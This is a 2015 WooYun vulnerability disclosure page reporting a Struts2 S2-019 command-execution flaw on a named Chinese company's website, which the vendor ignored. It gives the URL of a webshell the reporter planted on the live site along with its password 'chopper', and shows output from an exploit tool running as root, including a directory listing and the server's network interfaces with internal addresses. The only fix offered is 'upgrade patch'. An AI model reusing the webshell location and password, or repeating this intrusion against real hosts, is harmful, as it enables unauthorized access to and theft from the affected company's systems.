当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093393

漏洞标题:宇天科技st2任意命令执行(已getshell和被入侵)

相关厂商:浙江宇天科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-01-23 10:50

修复时间:2015-03-09 10:52

公开时间:2015-03-09 10:52

漏洞类型:命令执行

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.yutian.com.cn/1.jsp 密码chopper

Target: http://www.yutian.com.cn/index.action
Useage: S2-019
Whoami: root
WebPath: /home/yutian/portalTomcat/webapps/web/


★K8cmd-> ls
===============================================
124.232.158.110:421
bin
conf
dlcfg
fake.cfg
lib
LICENSE
logs
NOTICE
rc.syn
RELEASE-NOTES
RUNNING.txt
temp
webapps
work
=================================================

漏洞证明:

==================================================
eth0 Link encap:Ethernet HWaddr 00:27:19:96:6F:BC
inet addr:192.168.100.63 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::227:19ff:fe96:6fbc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:262855282 errors:7 dropped:12 overruns:2 frame:0
TX packets:1935301530 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:23226196927 (21.6 GiB) TX bytes:309925673214 (288.6 GiB)
Interrupt:50 Base address:0x2c00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:7694494 errors:0 dropped:0 overruns:0 frame:0
TX packets:7694494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:446993739 (426.2 MiB) TX bytes:446993739 (426.2 MiB)
virbr0 Link encap:Ethernet HWaddr 0
========================================================

修复方案:

111.PNG


升级补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝